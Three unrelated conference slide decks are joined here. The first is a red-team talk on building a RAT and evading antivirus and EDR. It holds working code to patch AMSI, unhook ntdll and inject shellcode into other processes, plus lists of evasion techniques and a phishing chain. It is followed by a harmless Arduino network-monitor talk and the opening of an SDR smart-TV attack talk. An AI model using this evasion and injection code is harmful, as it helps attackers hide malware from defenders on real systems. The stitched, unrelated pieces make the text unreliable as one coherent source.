Managing stream of packets
UI/UX
C2
Angular UI
Stream of packets
+ notifications
Clients
Packets
Files
State
30
RAT Development
06/01/2022
Demo: File Browser, Upload, Download
ID T1105: Command and Control: Ingress Tool Transfer
ID T1020: Exfiltration: Automated Exfiltration
ID T1048.001: Exfiltration: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
31
RAT Development
06/01/2022
Demo: Downstream / Wingman
32
RAT Development
06/01/2022
Making it reliable and robust with tests
●
Unittests
●
Integration Tests
●
REST Tests, Websocket Tests
●
Client->Server Tests, Server->Client Tests
●
Refactoring
But especially:
●
Reconnection Tests
●
Proxy Tests
●
Command Execution Tests
Reliability and Robustness
33
RAT Development
06/01/2022
# Test doing 80% code coverage
s := Server()
c := Client()
s.adminChannel <- cmdWhoami
go s.start()
go c.start()
packet := <-s.incomingPacket
assert(packet.response["output"] == "dobin")

# Test reconnection (cont.)
s.shutdown()
s = Server()
go s.start()
s.adminChannel <- cmdWhoami
packet = <-s.incomingPacket
assert(packet.response["output"] == "dobin")
Tests
34
RAT Development
06/01/2022
Develop
your own
RAT
Antivirus
Evasion
35
RAT Development
06/01/2022
Import
Table
File
Code
Data
Signature
Scanning
Heuristics
Import
Table
Process
Code
Data
AMSI
Real-time scanner
For .NET,
Powershell
Sandbox
AV components
36
RAT Development
06/01/2022
[INFO ][reducer.py: 58] scanSection() :: Result: 1157277-1157322 (45 bytes)
65 6E 67 65 00 02 00 49 5F 4E 65 74 53 65 72 76 enge...I_NetServ
65 72 54 72 75 73 74 50 61 73 73 77 6F 72 64 73 erTrustPasswords
47 65 74 00 00 00 00 49 5F 4E 65 74 53 Get....I_NetS
[INFO ][reducer.py: 58] scanSection() :: Result: 1158195-1158207 (12 bytes)
00 38 01 47 65 74 43 6F 6E 73 6F 6C .8.GetConsol
[INFO ][reducer.py: 58] scanSection() :: Result: 1158207-1158251 (44 bytes)
65 4F 75 74 70 75 74 43 50 00 00 09 03 53 65 74 eOutputCP....Set
43 6F 6E 73 6F 6C 65 4F 75 74 70 75 74 43 50 00 ConsoleOutputCP.
00 6C 00 43 72 65 61 74 65 50 72 6F .l.CreatePro
Antivirus: Signature Scanning (avred)
37
RAT Development
06/01/2022
Antivirus: Heuristics (PEStudio)
38
RAT Development
06/01/2022
PS E:\> copy .\PowerView.ps1 .\PowerView2.ps1
PS E:\> . .\PowerView2.ps1
At E:\PowerView2.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious
content and has been blocked by
your antivirus software.
AMSI - detect on-load
39
RAT Development
06/01/2022
When developing your own RAT:
●
Signature scanning:
○
No signatures :-) (FUD)
●
Heuristics
○
Dont import too much functionality into the RAT
○
Or: Dynamic imports, D/Invoke
○
Generally not a problem
●
Sandbox
○
RAT doesnt do anything except waiting for commands
○
Detect sandbox and exit
○
Calculate some primes…
○
Generally not a problem
●
AMSI
○
Not applicable, as not .NET/Powershell
Defeating the AV
40
RAT Development
06/01/2022
Develop
your own
RAT
execute
your tools
41
RAT Development
06/01/2022
List of Red Team tools
PE EXE/DLL, unmanaged
●
Mimikatz
●
Dumpert
.NET/C#, managed code
●
Rubeus
●
Seatbelt
●
SharpHound
●
SharpSploit
●
SharpUp
●
SharpView
Powershell:
●
ADRecon
●
PowerSploit (obsolete)
●
Load .NET in process
●
AMSI Pypass
●
Obfuscation + download
●
Reflective PE loader
●
Process injection shellcode
●
Obfuscation
●
AMSI bypass: amsi.fail
42
RAT Development
06/01/2022
CLRCreateInstance(CLSID_CLRMetaHost, IID_ICLRMetaHost, (LPVOID*)&metaHost);
metaHost->GetRuntime(L"v4.0.30319", IID_ICLRRuntimeInfo, (LPVOID*)&runtimeInfo);
runtimeInfo->GetInterface(CLSID_CLRRuntimeHost, IID_ICLRRuntimeHost, (LPVOID*)&runtimeHost);
runtimeHost->Start();
HRESULT res = runtimeHost->ExecuteInDefaultAppDomain(
    L"C:\\labs\\bin\\Debug\\CLRHello1.exe",
    L"CLRHello1.Program", L"spotlessMethod",
    L"test", &pReturnValue);
Loading managed code
Code
.NET Runtime
AMSI.dll
Process
Executing Managed Code (.NET / Powershell bytecode)
exec
scan
43
RAT Development
06/01/2022
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, 6, 0x40, [ref]$p)
# mov eax, 0x80070057 (E_INVALIDARG); ret
$Patch = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
Patch AMSI
Code
.NET Runtime
AMSI.dll
Process
AMSI Patch
exec
44
RAT Development
06/01/2022
AV/EDR uses UMH (Usermode Hooks)
●
Map a DLL in each process
●
Patch ntdll.dll to jump first to the av.dll
●
Av.dll scores invocations of potentially malicious
library calls
○
LoadLibrary(), GetProcaddress(),
VirtualProtect()
●
Kill process if it looks malicious
Code
.NET Runtime
AMSI.dll
Process
ntdll.dll
av.dll
Usermode hooks
45
RAT Development
06/01/2022
Kernel32.dll
NTDLL.DLL
Syscall
CreateProcessA()
VirtualAlloc()
WriteProcessMemory()
Usermode Hooks
46
RAT Development
06/01/2022
Kernel32.dll
NTDLL.DLL (Patched, UMH)
Syscall
CreateProcessA()
VirtualAlloc()
WriteProcessMemory()
AV.dll
Usermode Hooks
●
Map a DLL in each process
●
Patch ntdll.dll to jump first to the av.dll
●
Av.dll scores invocations
●
Kill process if it looks malicious
47
RAT Development
06/01/2022
Kernel32.dll
NTDLL.DLL (Un-Patched)
Syscall
CreateProcessA()
VirtualAlloc()
WriteProcessMemory()
AV.dll
Usermode Hooks
●
Restore ntdll.dll from disk
●
Uses
○
VirtualAlloc,
WriteProcessMemory
48
RAT Development
06/01/2022
Kernel32.dll
NTDLL.DLL (Un-Patched)
Syscall
CreateProcessA()
VirtualAlloc()
WriteProcessMemory()
AV.dll
Usermode Hooks
●
Restore ntdll.dll from disk
○
Using direct syscalls
49
RAT Development
06/01/2022
To execute managed code:
● Patch AMSI
  ○ So our .NET tools don't get detected
  ○ (AMSI-patch technique)
● Patch NTDLL.dll
  ○ So our "Patch AMSI" does not get detected
  ○ (Reflexxion technique)
● Using direct syscalls
  ○ So our "Patch NTDLL.dll" does not get detected
  ○ (Syswhisper technique)
● (Obfuscate direct syscall invocation)
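As a sketch of the "restore ntdll.dll from disk" step (the Reflexxion idea), here in C rather than the talk's Go: map a clean copy from System32 and copy its .text section over the hooked image. Error handling is omitted, and in practice the memory calls would themselves be issued as direct syscalls, since VirtualProtect is exactly what the EDR hooks:

#include <windows.h>
#include <string.h>

void UnhookNtdll(void)
{
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");

    // Map a clean copy of ntdll.dll from disk as an image
    HANDLE hFile = CreateFileA("C:\\Windows\\System32\\ntdll.dll", GENERIC_READ,
                               FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    HANDLE hMap  = CreateFileMappingA(hFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    LPVOID clean = MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0);

    // Locate the .text section of the loaded (hooked) ntdll
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)hNtdll;
    PIMAGE_NT_HEADERS nt  = (PIMAGE_NT_HEADERS)((PBYTE)hNtdll + dos->e_lfanew);
    PIMAGE_SECTION_HEADER sec = IMAGE_FIRST_SECTION(nt);

    for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
        if (memcmp(sec->Name, ".text", 5) != 0)
            continue;
        LPVOID dst = (PBYTE)hNtdll + sec->VirtualAddress;
        LPVOID src = (PBYTE)clean  + sec->VirtualAddress;
        DWORD old;
        // Overwrite the hooked code with the clean bytes
        VirtualProtect(dst, sec->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &old);
        memcpy(dst, src, sec->Misc.VirtualSize);
        VirtualProtect(dst, sec->Misc.VirtualSize, old, &old);
    }

    UnmapViewOfFile(clean);
    CloseHandle(hMap);
    CloseHandle(hFile);
}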
Executing managed code technique
Donut + Reflexxion
50
RAT Development
06/01/2022
Demo: Remote .NET execution
ID: T1055: Process Injection
ID: T1620: Reflective Code Loading
ID: T1106: Native API
51
RAT Development
06/01/2022
Develop
your own
RAT
EDR
Evasion
52
RAT Development
06/01/2022
SOC - Security Operations Center
aka Blue Team, aka CDC, aka D&R (Detection & Response)
SOC
53
RAT Development
06/01/2022
Monitor endpoint
Collect alarms (e.g. from AV’s)
Collect events (e.g. from sysmon or EDR agents)
●
Rule based detection (e.g. lolbins)
●
AI based detection
Dispatch to Analysts
EDRs
54
RAT Development
06/01/2022
Steahlthily execute a EXE
●
As genuine, non-malicious process
●
Basically EXE path spoofing
Process hollowing:
●
“Fancy” process injection
●
Start a non-malicious process
●
Replace its content with another EXE/PE
●
Resume process
Process hollowing
55
RAT Development
06/01/2022
Process injection:
● OpenProcess to get the process information
● VirtualAllocEx to allocate some memory inside the process for the shellcode
● WriteProcessMemory to write the shellcode inside this space
● CreateRemoteThread to tell the process to run the shellcode with a new thread
Process hollowing:
● CreateProcessA to start a new process. The flag 0x4 is passed to start it suspended, just before it would run its code.
● ZwQueryInformationProcess to get the address of the process's PEB (process environment block)
● ReadProcessMemory to query the PEB for the image base address
● ReadProcessMemory again to read from the image base address (loading in the PE header for example)
● WriteProcessMemory to overwrite the memory from the code base address with shellcode
● ResumeThread to restart the suspended process, triggering the shellcode.
Source: https://github.com/ChrisPritchard/golang-shellcode-runner
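The four-call injection sequence above as a minimal C sketch (target PID and shellcode buffer are assumed inputs; error handling omitted):

#include <windows.h>

void InjectShellcode(DWORD pid, const unsigned char *shellcode, SIZE_T len)
{
    // 1. OpenProcess to get a handle on the target
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

    // 2. VirtualAllocEx to carve out memory for the shellcode
    LPVOID remote = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT | MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);

    // 3. WriteProcessMemory to copy the shellcode over
    WriteProcessMemory(hProcess, remote, shellcode, len, NULL);

    // 4. CreateRemoteThread to run it in the target
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0,
                                        (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL);

    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
    CloseHandle(hProcess);
}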
Process hollowing
56
RAT Development
06/01/2022
0
2^64
Code
Kernel32.dll
NTDLL.DLL
av.dll
Syscall
VirtualAlloc()
VirtualAlloc()
VirtualAlloc()
Again UMH bypass
57
RAT Development
06/01/2022
0
2^64
Code
Kernel32.dll
NTDLL.DLL
av.dll
Syscall
VirtualAlloc()
VirtualAlloc()
Again UMH bypass
58
RAT Development
06/01/2022
Demo: Process Hollowing
ID: T1055.012 “Projess Injection: Process Hollowing”
59
RAT Development
06/01/2022
Demo: Copy First
ID: T1036.003 Masquerading: Rename System Utilities
60
RAT Development
06/01/2022
Develop
your own
RAT
Summary
EDR/AV Evasion
61
RAT Development
06/01/2022
RAT
Tools
Hide RAT
(signatures)
Hide Tools
(signatures)
Hide Tools Execution
(UMH, EDR)
Security product defense
62
RAT Development
06/01/2022
malware.exe
Domain.ch
1.2.3.4
net.exe
cmd.exe
wmic.exe
lolbins
mimikatz.exe
adfind.exe
Hacking tools
AV
EDR
exec
Process Injection
Process Hollowing
Shellcode Execution
Signatures
Usermode Hooks
Events
powershell.exe
dotnet.exe
Malicious scripts
AMSI
http
63
RAT Development
06/01/2022
Command executions
Execute
cmd.exe
commandline
Powershell
commandline
LOL EXE’s
copyfirst
hollow
remote
.NET, Powershell
Sacrificial process
AMSI bypass
64
RAT Development
06/01/2022
Running shellcode techniques:
●
CreateFiber
●
CreateProcess
●
CreateProcessWithPipe
●
CreateRemoteThread
●
CreateRemoteThreatNative
●
CreateThread
●
CreateThreadNative
●
EarlyBird
●
EtwpCreateEtwThreadEx
●
RtlCreateUserThread
●
Syscall
●
UuidFromStringA
●
NtQueueApcThread
Fix or bypass ntdll.dll hooks:
●
Syswhisper 1, 2, 3
○
Direct syscalls
●
Hell’s Gate
○
Direct syscalls
●
BananaPhone
○
Like hells gate, but more go, more banana
●
Firewalker
○
Single-step ntdll.dll calls, find jmp and live-patch
code
●
Parallel-asis
○
Using windows parallel loader to load ntdll.dll
again
●
ScareCrow
○
Overwrite ntdll from disk (framework, detected
now?)
●
Reflexxion
○
Overwrite ntdll from disk
○
Using direct system calls
○
Go implementation
Security product defense
65
RAT Development
06/01/2022
Confuse EDR’s
PE:
●
Process Ghosting
○
Temporary PE
●
Process Herpaderping
○
PE in transacted state
●
Process Doppelgänging
○
PE in delete pending state
(TxF)
●
Process Reimaging
○
Cache syncronization issue
●
Module Stomping
●
Function Stomping
Security product defense
Memory scanning evasion:
●
Gargoyle
●
DeepSleep
66
RAT Development
06/01/2022
●
SOCKS5 proxy support
○
Dont run tools on the endpoint
○
Run tools on your analyst workstation
○
Just proxy everything through the RAT
■
Burp, nmap, RDP, SSH, Impacket for SMB attack
●
Todo: Implement OctoPwn Dolphin agent
○
See talk yesterday “Hacking from the browser” from Tamas Jos
Avoid tools, proxy traffic
Open features
67
RAT Development
06/01/2022
Develop
your own
RAT
Summary
68
RAT Development
06/01/2022
●
AV & EDR can be bypassed easily
○
Mostly defender in this presentation
●
Lots of scanning and detection still happen in userspace
○
Even in our own address space!
●
This may change in the future?
○
Kernel mode hooks
○
Mini-filter
●
Move to lower level better logging
Security products bypass summary
69
RAT Development
06/01/2022
Is it worth writing your own RAT as a RedTeam?
●
Probably smarter to use, patch, or update existing open source one
●
Or just write your own Agent
○
Re-use existing C2
Is it worth it as an enthusiast?
●
Absolutely
DIY?
70
RAT Development
06/01/2022
RAT Development for RedTeaming
●
Analyse SOC Usecases
●
Define required features
●
Think about architecture
●
Steal Copy from existing projects
●
Time required: Months++
●
Features:
○
Execute stuff
○
Upload, download files
DIY for RedTeams
71
RAT Development
06/01/2022
Sliver: https://github.com/BishopFox/sliver (Go) <- hype
Merlin: https://github.com/Ne0nd0g/merlin (Go)
Mythic: https://github.com/its-a-feature/Mythic (Python)
Apollo, Mythic Agent: https://github.com/MythicAgents/Apollo (.NET)
Covenant: https://github.com/cobbr/Covenant (.NET)
Empire: https://github.com/BC-SECURITY/Empire (PowerShell, C#)
C2 Alternatives
72
RAT Development
06/01/2022
Not covered: Detect tool actions
●
IDS
●
NIDS
●
AD/DC surveillance (e.g. Defender for Identity)
●
Honeypots
Also: Every AV and EDR is different
Not covered security tools
73
RAT Development
06/01/2022
Oh no (Defender)
74
RAT Development
06/01/2022
Thank you for your time
Probably no time for questions… :-(
75
RAT Development
06/01/2022
https://github.com/klezVirus/inceptor/tree/main/slides
Inceptor - Bypass AV-EDR solutions combining well known techniques
https://synzack.github.io/Blinding-EDR-On-Windows/
Blinding EDR On Windows
76
RAT Development
06/01/2022
Proxy Support
●
For HTTP and Websocket
●
Authenticated proxy (password,
kerberos… -> proxyplease library)
File upload/download
●
Size…
●
Dont wanna log it completely?
Communication
●
Go, Websockets require strongly typed
data
●
Request arguments, response data is
variable
●
Dict type key/value
Smartness
●
Put smartness into Client, C2, Or UI?
Windows mischief
●
Mimikatz integration
●
LSASS dumping
●
Windows process token
●
Pass the hash
SOCKS Proxy support
CI/CD integration
Not covered features
77
RAT Development
06/01/2022
Oh no (Sophos)
78
RAT Development
06/01/2022
Donut
●
Compile .NET/EXE to Shellcode
●
Execute shellcode in new process
C2
Donut
RAT
Donut
Simple
Stupid
EXE
shellcode
A typical phishing attack
Docx
Makro: exec bat
bat
Write vbs
Execute vbs
Powershell script
Download malware / RAT
Phishing Mail
Vbs
Download Powershell script
Execute powershell script
80
RAT Development
06/01/2022
Dev Envrionment:
●
Proxmox @ Hetzner
●
Wireguard
●
Caddy
●
Visual Studio Code with remote development server
81
RAT Development
06/01/2022
●
EDRs collect data from endpoints and send them for storage and
processing in a centralised database. There, the collected events, binaries
etc., will be correlated in real-time to detect and analyse suspicious activities
on the monitored hosts. Thus, EDRs boost the capabilities of SOCs as they
discover and alert both the user and the emergency response teams of
emerging cyber threats.
●
EDRs are heavily rule-based; nevertheless, machine learning or AI methods
have gradually found their way into these systems to facilitate finding new
patterns and correlations
Source: An Empirical Assessment of Endpoint Security Systems Against Advanced Persistent Threats Attack Vectors
EDRs
Operational security
●
Operational security
○
Make connectors authenticated (api-key)
○
Make backend authenticated (admin-api-key)
○
Encrypt all communication
○
(Sign packets)
●
Protocol Mischief
○
Assuming BlueTeam reversed found malware
○
Snoop on broadcasted commands (identify further IOC’s)
○
Inject commands for other clients?
○
Accessing commands from other clients?
○
Access uploaded data (from client, or further attack tools)?
○
Flood server with fake answers, making it unusable?
83
RAT Development
06/01/2022
Why write a RAT?
BloodHoundGang slack
84
RAT Development
06/01/2022
Downstream / Wingman
RAT.exe
Wingman.exe
SMB Pipes
Files
TCP Socket
(loyal) Wingman.exe
85
RAT Development
06/01/2022 | pdf |
Blinkie Lights!
Network Monitoring with Arduino
Steve Ocepek
Copyright Trustwave 2010
Confidential
Disclaimer
Due to legal concerns, slides containing one or more of the
following have been removed:
•
Depictions of violence
•
Dancing animals
•
Transvestites
•
Questionable remains of biological origin
•
Drunk people
•
Copyrighted images
LEGAL APPROVED*
* subject to terms and conditions
Copyright Trustwave 2010
Confidential
Early Market Trends
* not affiliated with Diamond Multimedia or its subsidiaries
Copyright Trustwave 2010
Confidential
Industry Progression
* smoking Cloud may be hazardous to your health.
Copyright Trustwave 2010
Confidential
Realization
•
I don’t know what the hell my box is doing anymore
•
I don’t know what normal looks like
•
2 minute pcap file > 2 minute MP3
•
My netstat hurts
Copyright Trustwave 2010
Confidential
The Activity Light is Solid
Copyright Trustwave 2010
Confidential
Third Party Analysis
* any resemblance to real persons, living or dead is purely coincidental.
Copyright Trustwave 2010
Confidential
Wait, monitoring?
#1: You mean like IDS, IPS, NAC, sniffers, scrapers, log
monitors, and the theory of Atlantis?
#2: No, I mean like wtf is my box doing?
#1: Yeah try wireshark noob
#2: Just because I am a genetically enhanced 3-month-old is
no reason to make this personal. Besides wireshark is for
analysis, not monitoring.
#3: Can you guys keep it down? This 2-person escape pod is
bad enough without your 21st century era IT debate
reenactments.
Copyright Trustwave 2010
Confidential
Something… else
•
Like the old days, the activity lights on modems and stuff
•
Something that makes a good excuse for Arduino and
sounds good on a Defcon schedule
•
And has freaking blinkie lights
•
Something that provides visibility
Copyright Trustwave 2010
Confidential
Visibility vs. Visualization
•
Going for something that’s more “peripheral”, tap into
human cognition
•
Making up my own distinctions here
•
Visualization
• Tends to be complex, static image that we stare at
•
Visibility - more tactical, realtime
• i.e. the military term: our ability to “see” what’s there
(depending on weather conditions, etc) and make decisions
•
Visualization taps into our ability to reason
•
Visibility taps into our cognition
Copyright Trustwave 2010
Confidential
Real-time Cognition
•
I only sort of know what I’m talking about here
•
Examples:
• Driving
• Video Games
• Sports
•
Direct connection between the senses
•
Acute perception of slight variances in stimuli
•
Dude I made that up and it sounds awesome
Copyright Trustwave 2010
Confidential
Scholarly Reference
“Real-time cognition is best described not as a sequence of
logical operations performed on discrete symbols but as a
continuously changing pattern of neuronal activity.”
Continuous Dynamics in Real-Time Cognition
Michael J. Spivey and Rick Dale
Cornell University and University of Memphis
Let’s play with electronics
Copyright Trustwave 2010
Confidential
Peripherals
•
Screen real estate market is tapped out
• The maximize button
• Widget displays such as Dashboard are on-demand only
•
USB trinkets/toys are on the rise
• Nerf shooter
• Ninja detectors
• LED Christmas trees
Copyright Trustwave 2010
Confidential
Crazy idea
•
Render network data onto LED matrix in realtime
•
Use color, motion, other effects to show what happening on
the wire
•
Try to get back a “feel” for what our systems are doing
•
Tap into our natural pattern-matching ability to detect
variances
Copyright Trustwave 2010
Confidential
cerealbox
•
Name came from our tendency to read/interpret anything in
front of us
•
Kind of a “background” technology, something that we see
peripherally
•
Pattern detection lets us see variances without digging too
deep
•
Just enough info to let us know when it’s time to dig deeper
Copyright Trustwave 2010
Confidential
Arduino Uno
•
Cool little boards, based on Atmel ATMega328
• 8-bit RISC CPU @ 16Mhz
• 32k flash (storage for program code / opt. static storage)
• 2k SRAM (storage for data manipulation by program)
•
USB-powered
•
USB-to-serial communication
• ATMega8U2
• No hardware handshaking yet L
•
Good reference manual, easy-to-use
IDE
•
Price: ~ $30
Copyright Trustwave 2010
Confidential
Colors Shield
•
Arduino “shield” that connects to header pins
•
Makes it easy to manipulate multicolor LEDs
directly
•
iTead Studio: ~15
•
Plus 8x8 multicolor
LED Matrix: ~21
•
Total for all parts, about $66
Copyright Trustwave 2010
Confidential
Design Goals
•
Simplicity
•
Controller on host system sends data over serial
•
cerealbox interprets, renders to screen
•
Minimal data retention (2k SRAM!)
•
Minimal data processing
• Session based vs. packet based
•
Easy to understand, extend
Copyright Trustwave 2010
Confidential
Data points
•
MAC address
• L2 data might let us do something about MITM
•
IP address
•
TCP/UDP port
• Breakdown data by service
•
Country Code
• Let’s take advantage of GeoIP
Copyright Trustwave 2010
Confidential
Language
1,00254B000102,0A000001,0050,US
1 – Command, open = 1, close = 2
MAC Address
IP Address (hex)
Port number (hex)
Country Code
Copyright Trustwave 2010
Confidential
Arduino code
•
Session tracker code on Defcon CD
•
Everything is basic C – limited but “good enough”
•
Primary tools are arrays and for loops
•
Hashtables – possible with hacks but not native
Copyright Trustwave 2010
Confidential
Arduino code
Text processing is fun
//"1"
-‐
add
command
if
(cmd[0]
==
49
||
cmd[0]
==
50)
{
//Check
validity
of
data
boolean
invalid
=
false;
for
(int
x=1;
x
<
28;
x++)
{
if
((cmd[x]
>=
48
&&
cmd[x]
<=
57)
||
(cmd[x]
>=
65
&&
cmd[x]
<=
90)
||
(cmd[x]
==
44))
{}
else
invalid
=
true;
}
Copyright Trustwave 2010
Confidential
Colorduino Library
• C library by Lincomatic, huge help in dealing with LEDs
• Works with Colors Shield and Colorduino by iTead
Setting an LED:
// Set 3,8 to Blue
Colorduino.SetPixel(3, 8, 0, 0, 255);
Colorduino.FlipPage();
// Using a pointer
PixelRGB *p = GetPixel(3, 8);
p->r = 0;
p->g = 0;
p->b = 255;
// Can do p++ to increment through LEDs
Copyright Trustwave 2010
Confidential
Converting Country Code to RGB
• Country colors are procedurally created
  • vs. a table, which would take up SRAM/Flash
• Arduino random is simply a long string of numbers
  • Can use other sources for true random
  • But we actually want reproducible pseudo-random numbers
• ASCII value of last Country Code letter is Random Seed for Red
• First letter -> Green
• Resulting Green random number is seed for Blue
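A sketch of that scheme in Arduino-flavored C — countryColor is an illustrative name, and the seeding order follows the slide (last letter seeds Red, first letter seeds Green, the Green draw reseeds for Blue):

// Derive a reproducible pseudo-random color from a two-letter country code.
void countryColor(const char *cc, byte *r, byte *g, byte *b) {
    randomSeed(cc[1]);      // ASCII of last letter seeds Red
    *r = random(256);

    randomSeed(cc[0]);      // ASCII of first letter seeds Green
    long gDraw = random(256);
    *g = (byte)gDraw;

    randomSeed(gDraw);      // the Green result seeds Blue
    *b = random(256);
}

Same code, same RGB for every "US" session — reproducible without burning SRAM or flash on a lookup table.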
Copyright Trustwave 2010
Confidential
All the Colors of the Skype Rainbow
Copyright Trustwave 2010
Confidential
Data Storage
•
Simplified communication model = Arduino data storage
•
Close (IP) (Port) – how does it know which LED?
•
Store IP and Port in array
•
9 bytes per entry
• RGB, IP, Port
•
128 entries ~ 1.2K
• OMG mah SRAM’s
Copyright Trustwave 2010
Confidential
Array
// Add to array
led[pos][0] = r;
led[pos][1] = g;
led[pos][2] = b;
// pos 3-6 are ip
led[pos][3] = tohex(cmd[15])*16 + tohex(cmd[16]);
led[pos][4] = tohex(cmd[17])*16 + tohex(cmd[18]);
led[pos][5] = tohex(cmd[19])*16 + tohex(cmd[20]);
led[pos][6] = tohex(cmd[21])*16 + tohex(cmd[22]);
// pos 7-8 are port
led[pos][7] = tohex(cmd[24])*16 + tohex(cmd[25]);
led[pos][8] = tohex(cmd[26])*16 + tohex(cmd[27]);
Copyright Trustwave 2010
Confidential
Meter mode
•
Another take on the dataset
•
Based on types of sessions being made
•
Equalizer-ish view
•
Give visibility to spikes, type of traffic being sent
Copyright Trustwave 2010
Confidential
Performance considerations
•
9600 bps link, no handshaking
• Could up the speed, but be careful
•
9600 bps ~ 1200 bytes/second
•
Message size: 32 bytes
•
37 messages / sec, real probably about 32
Copyright Trustwave 2010
Confidential
Inferno mode
•
Display limited to 128 connections
•
Need to have a freak-out mode
• Throw hands up
• Let user know that things are getting silly
•
Preferably something psychedelic
Copyright Trustwave 2010
Confidential
Overload Detection
#define OVERLOAD 90

if (numcmd > OVERLOAD) {
    mode = 9;
    // Delete all and start over
    while (pos > 0) {
        delete_record(pos - 1);
        pos--;
    }
}
Copyright Trustwave 2010
Confidential
Controller code
•
Perl script using Net::Pcap
• It works on Snow Leopard too
•
Fairly simple logic to enumerate sessions, do GeoIP
•
Pipes over serial to Arduino
•
2 messages, Open (1) and Close (2)
Copyright Trustwave 2010
Confidential
Future Ideas
•
Ethernet Shield
• Eliminate need for USB/program
• Would need 2x adapters
• Performance would probably
take a crap
•
Better host-side program
• Show more data behind each
light
•
Bigger LEDs
• You know, for senior citizens
Copyright Trustwave 2010
Confidential
Links
•
Lincomatic’s Colorduino library
• http://blog.lincomatic.com/?p=148
•
iTead – makers of Colors Shield and Colorduino
• http://iteadstudio.com
•
Arduino Uno
• http://arduino.cc/en/Main/ArduinoBoardUno
•
Ardunio Programming Reference
• http://arduino.cc/en/Reference/
Q & A | pdf |
DefCON 27, Pedro Cabrera
SDR Against Smart TVs;
URL and channel injection
attacks
DefCON 27, Pedro Cabrera
@PCabreraCamara
DefCON 27, Pedro Cabrera
Industrial engineer, UAV professional pilot, Radio Ham (EA4HCF)
Ethon Shield, Founder
2018 RSA: “Parrot Drones Hijacking”
2017 BH Asia Trainings (+ Simon Roses):
“Attacking 2G/3G mobile networks, smartphones and apps”
RogueBTS, IMSICatchers, FakeStations: www.fakebts.com
@PCabreraCamara
About Me
DefCON 27, Pedro Cabrera
This.Presentation:
I.
HbbTV 101. Digital TV introduction
II. Hacking TV & HbbTV.
III. HbbTV RX stations.
IV. Targeting the Smart TV browser.
V. Conclusions
DefCON 27, Pedro Cabrera
[I] Hybrid Broadcast Broadband Television
HbbTV
(2009)
H4TV
project
HTML profit
project
Hybrid television because it
merges digital television
content and web content.
The HbbTV specification extends DVB-T by introducing additional metadata formats that mix broadband Internet
content into the digital television channel.
SPA
ENG
DefCON 27, Pedro Cabrera
[I] TV Distribution Network
Generic TV Network
DefCON 27, Pedro Cabrera
[I] DVB-T
DVB-T characteristics (Spain):
•
8 MHz bandwidth
•
Transmission mode: 8k (6,817 carriers).
•
Modulation schemes: 64 Quadrature Amplitude Modulation
(OFDM)
•
Code Rate for internal error protection: 2/3.
•
Length of guard interval: 1/4.
DefCON 27, Pedro Cabrera
[I] DVB-T
DVB-T characteristics (Spain):
•
8 MHz bandwidth
•
Transmission mode: 8k (6,817 carriers).
•
Modulation schemes: 64 Quadrature Amplitude Modulation
(OFDM)
•
Code Rate for internal error protection: 2/3.
•
Length of guard interval: 1/4.
DefCON 27, Pedro Cabrera
[I] Generic DVB-T receiver
Radio
Frequency
MPEG-2
Multiplex
DeModulator
DeMultiplexer
Video Decoder
Audio Decoder
Metadata
Decoder
DVB-T
Tuner
RTL-SDR:
Rafael 820T2
RTL-SDR:
Realtek RTL2832u
DefCON 27, Pedro Cabrera
[I] DVB-T demodulator
MPEG-2
MUX
Radio
Frequency
RadioFreq
Receiver
ADC
Synchronizer
Fast Fourier
Transformer
Channel
Estimator
&
Channel
Equalizer
Inner Deinterleaver
Viterbi
Decoder
Outer
Deinterleaver
Reed
Solomon
Decoder
DeScrambler
DefCON 27, Pedro Cabrera
[I] DVB-T linux demodulator
•
Bogdan Diaconescu
(YO3IIU)
gr-dvbt
(USRP N210)
•
GNU Radio:
gr-dtv (USRP)
•
Ron Economos (W6RZ)
dtv-utils (BladeRF)
DefCON 27, Pedro Cabrera
DVB-T Modulation:
- 8 MHz Bandwidth (SR)
- Transmission mode: 8k
- Modulation scheme: 64 QAM
- Code Rate: 2/3.
- Length of guard interval: 1/4
[I] DVB-T linux demodulator
DefCON 27, Pedro Cabrera
[I] TV Channels & Frequencies
Digital Multiplex | Channel            | Frequency
MPE5              | atreseries HD      | 482.000.000
MPE5              | BeMad tv HD        | 482.000.000
MPE5              | Realmadrid TV HD   | 482.000.000
MPE4              | TRECE              | 514.000.000
MPE4              | Energy             | 514.000.000
MPE4              | mega               | 514.000.000
MPE4              | Boing              | 514.000.000
MPE1              | PARAMOUNT CHANNEL  | 570.000.000
MPE1              | GOL                | 570.000.000
MPE1              | DMAX               | 570.000.000
MPE1              | Disney Channel     | 570.000.000
TL06M             | TRECE              | 618.000.000
TL06M             | Intereconomia TV   | 618.000.000
TL06M             | HIT TV             | 618.000.000
TL06M             | MegaStar           | 618.000.000
TL06M             | CGTN-Español       | 618.000.000
TL06M             | Canal Galería      | 618.000.000
TL06M             | Business TV        | 618.000.000
TL06M             | 8madrid            | 618.000.000
RGE2              | tdp HD             | 634.000.000
RGE2              | TEN                | 634.000.000
RGE2              | DKISS              | 634.000.000
RGE2              | tdp                | 634.000.000
RGE2              | Clan HD            | 634.000.000
MPE3              | Telecinco          | 698.000.000
MPE3              | Telecinco HD       | 698.000.000
MPE3              | Cuatro             | 698.000.000
MPE3              | Cuatro HD          | 698.000.000
MPE3              | FDF                | 698.000.000
MPE3              | Divinity           | 698.000.000
MAUT              | Telemadrid HD      | 746.000.000
MAUT              | Telemadrid         | 746.000.000
